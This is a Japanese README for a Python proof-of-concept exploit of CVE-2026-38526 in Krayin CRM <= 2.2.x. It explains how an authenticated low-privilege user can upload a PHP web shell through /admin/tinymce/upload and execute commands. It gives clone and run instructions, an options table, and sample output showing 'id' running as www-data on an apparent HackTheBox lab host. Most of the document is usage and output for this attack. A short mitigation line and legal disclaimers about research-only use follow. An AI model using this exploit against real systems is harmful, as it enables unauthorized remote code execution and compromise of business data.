
Krayin CRM <= 2.2.x の CVE-2026-38526 を悪用する Python PoC:認証を行い、/admin/tinymce/upload 経由で PHP ウェブシェルをアップロードし、リモートでコマンドを実行します。
⚠️ 法的警告:このコードは教育目的および 許可されたテスト(CTF、バグバウンティ、プライベートラボ)専用として提供されています。 作者は不正使用に対して一切の責任を負いません。
Krayin CRM(Webkul)≤ 2.2.x はエンドポイント /admin/tinymce/upload を公開しており、
これにより認証済みユーザー(低権限であっても)が拡張子の検証なしに
ファイルをアップロードできます。その後ファイルは storage/ フォルダから
配信されるため、PHPコードの任意実行が可能になります。
git clone https://github.com/<TON_PSEUDO>/cve-2026-38526.git
cd cve-2026-38526
pip install -r requirements.txt
python3 cve-2026-38526.py -t http://target.tld -u [email protected] -p 'password' -c 'id'
オプション:
| オプション | 説明 |
|---|---|
-t, --target | ターゲットのルートURL |
-u, --user | Krayinアカウントのメールアドレス |
-p, --password | パスワード |
-c, --command | 実行するコマンド(デフォルト:id) |
--login-path | ログインパス(デフォルト:/admin/login) |
--upload-path | アップロードパス(デフォルト:/admin/tinymce/upload) |
--timeout | HTTPタイムアウト(デフォルト:15) |
$ python3 cve-2026-38526.py -t http://billing.nexus.htb \
-u [email protected] -p 'N27xh!!2ucY04' -c 'id'
[*] http://billing.nexus.htb/admin/login でCSRFトークンを取得中
[*] ログインフォームを送信中
[+] 認証に成功しました
[*] http://billing.nexus.htb/admin/tinymce/upload 経由で x8f2k1ab.php をアップロード中
[+] ウェブシェルにアクセス可能:http://billing.nexus.htb/storage/tinymce/x8f2k1ab.php
[*] 実行中:id
============================================================
[+] コマンド:id
============================================================
uid=33(www-data) gid=33(www-data) groups=33(www-data)
============================================================
storage/ および uploads/ フォルダ内でのPHP実行を禁止する。本プロジェクトはセキュリティ研究目的で公開されています。事前の書面による 許可なくシステムに対して使用することは違法であり、固く禁じられています。